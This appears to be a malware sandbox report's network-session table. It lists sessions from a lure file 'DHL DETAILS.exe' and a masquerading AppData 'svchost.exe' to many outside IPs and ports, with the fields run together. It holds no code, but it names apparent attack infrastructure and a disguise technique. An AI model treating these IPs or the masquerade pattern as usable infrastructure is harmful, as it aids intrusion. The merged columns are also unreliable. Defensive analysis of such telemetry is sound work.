                                                                                    7195192.168.2.564496172.67.3.988043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7196192.168.2.564502104.20.123.1648056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7197192.168.2.564104103.79.96.193415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7198192.168.2.564550103.152.112.1678056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7199192.168.2.564399178.128.82.1053999356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7200192.168.2.553396132.148.20.70185046352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7201192.168.2.564144162.214.225.2233758156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7202192.168.2.553052142.4.7.20431006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7203192.168.2.564436123.110.158.2368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7204192.168.2.56425469.61.200.1043618156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7205192.168.2.56445464.56.150.102312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7206192.168.2.552558162.214.170.144395036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7207192.168.2.56444027.65.240.157108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7208192.168.2.564439202.150.1.878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7209192.168.2.564583104.21.194.1828043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7210192.168.2.564592172.67.182.1028056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7211192.168.2.56444782.137.244.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7212192.168.2.559928163.172.129.2511637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7213192.168.2.564561221.194.149.88043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7214192.168.2.564528193.138.178.6828243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7215192.168.2.56416194.23.220.1363580556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7216192.168.2.55315645.11.95.16550216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7217192.168.2.55346862.85.224.21756786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7218192.168.2.55322345.11.95.16550316352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7219192.168.2.552586103.197.71.7806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7220192.168.2.564619172.67.181.858056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7221192.168.2.55357145.11.95.16560146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7222192.168.2.552394132.148.128.88266066352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7223192.168.2.564566159.223.71.714992256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7224192.168.2.56354298.162.25.23414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7225192.168.2.552900103.182.112.1180006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7226192.168.2.564622191.102.159.157312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7227192.168.2.564582216.9.224.1138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7228192.168.2.56464845.196.151.120543256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7229192.168.2.564601120.78.191.2258056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7230192.168.2.56460443.128.146.421567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7231192.168.2.564629167.71.5.83312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7232192.168.2.56468047.114.101.57888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7233192.168.2.56469646.17.63.166415456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7234192.168.2.564776172.64.207.1858056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7235192.168.2.5647643.212.148.199312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7236192.168.2.560078173.212.209.2162713843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7237192.168.2.564638222.179.155.90909143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7238192.168.2.564799185.162.231.2268056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7239192.168.2.564713194.247.173.17808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7240192.168.2.563185103.146.137.5108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7241192.168.2.56473661.111.38.58056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7242192.168.2.56423645.11.95.165501943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7243192.168.2.564534117.160.250.163999056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7244192.168.2.564757122.51.123.2198043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7245192.168.2.564854104.17.239.108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7246192.168.2.564750193.84.89.202844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7247192.168.2.56476791.202.230.219808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7248192.168.2.56510061.130.9.3844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7249192.168.2.56510261.130.9.3844343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7250192.168.2.56510661.130.9.3844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7251192.168.2.56511161.130.9.3844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7252192.168.2.5648228.210.80.1911567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7253192.168.2.56486674.119.147.209414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7254192.168.2.564919199.188.93.214900043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7255192.168.2.56490638.162.0.221312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7256192.168.2.564967185.162.228.488043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7257192.168.2.56453568.71.247.130414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7258192.168.2.565003172.67.250.2128043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7259192.168.2.565237152.32.132.22044343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7260192.168.2.56488782.146.37.1458056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7261192.168.2.565241152.32.132.22044343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7262192.168.2.565247152.32.132.22044356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7263192.168.2.565250152.32.132.22044356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7264192.168.2.56499345.196.151.97543256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7265192.168.2.56078250.63.12.335078143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7266192.168.2.560878166.62.38.100632243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7267192.168.2.565185162.159.242.1098056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7268192.168.2.56521545.14.174.1808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7269192.168.2.564917202.150.1.878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7270192.168.2.565018159.203.61.169312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7271192.168.2.565031174.64.199.79414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7272192.168.2.56342082.223.121.72498556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7273192.168.2.56493982.137.244.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7274192.168.2.564923139.129.202.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7275192.168.2.56503318.228.198.1648043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7276192.168.2.563459158.220.91.231312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7277192.168.2.55507639.109.113.9731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7278192.168.2.565047103.166.141.742007443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7279192.168.2.560463104.248.158.785339643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7280192.168.2.56346945.76.150.195068556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7281192.168.2.56089534.135.166.248043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7282192.168.2.560737144.91.66.305828543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7283192.168.2.565255199.188.93.214900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7284192.168.2.5651278.219.179.2371567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7285192.168.2.565259104.21.66.1848056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7286192.168.2.565267104.23.107.1728043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7287192.168.2.564266218.65.6.150312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7288192.168.2.565219193.136.97.178056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7289192.168.2.561148162.214.225.2234841443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7290192.168.2.565229216.9.224.1138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7291192.168.2.56403668.71.254.6414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7292192.168.2.56086241.111.198.1088043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7293192.168.2.56442245.144.164.28999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7294192.168.2.56510169.61.200.1043618156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7295192.168.2.565251185.110.190.998056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7296192.168.2.560805132.148.245.2476034943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7297192.168.2.56529774.119.147.209414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7298192.168.2.565348192.154.246.96900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7299192.168.2.564427178.72.89.106808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7300192.168.2.565302122.51.123.2198056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7301192.168.2.5653058.210.80.1911567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7302192.168.2.565371162.159.250.1458043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7303192.168.2.565372199.188.93.214900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7304192.168.2.565386104.20.125.1248043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7305192.168.2.565043180.250.159.49415343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7306192.168.2.564634198.12.253.1173113143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7307192.168.2.56531245.11.95.165504756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7308192.168.2.55550031.42.184.1465775243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7309192.168.2.565426172.67.14.2378056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7310192.168.2.56536023.137.248.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7311192.168.2.56542068.71.254.6414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7312192.168.2.561953156.67.172.185312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7313192.168.2.56365451.158.125.1351637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7314192.168.2.561853143.208.152.61318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7315192.168.2.56539846.17.63.166415456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7316192.168.2.549202211.234.125.544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7317192.168.2.549203211.234.125.544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7318192.168.2.56146045.117.179.2098043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7319192.168.2.555806103.164.116.172808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7320192.168.2.565026115.244.127.1608056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7321192.168.2.565394202.150.1.878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7322192.168.2.565502192.154.246.96900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7323192.168.2.56541782.137.244.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7324192.168.2.56542445.11.95.165502156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7325192.168.2.561511103.70.206.1295931156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7326192.168.2.56492168.169.60.220838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7327192.168.2.56547774.119.147.209414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7328192.168.2.549158199.188.93.214900043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7329192.168.2.565454103.166.141.742007443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7330192.168.2.54919572.167.222.102949343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7331192.168.2.5654638.219.179.2371567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7332192.168.2.55660794.154.152.10807943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7333192.168.2.564833103.160.149.34312743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7334192.168.2.56164395.111.227.1645161056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
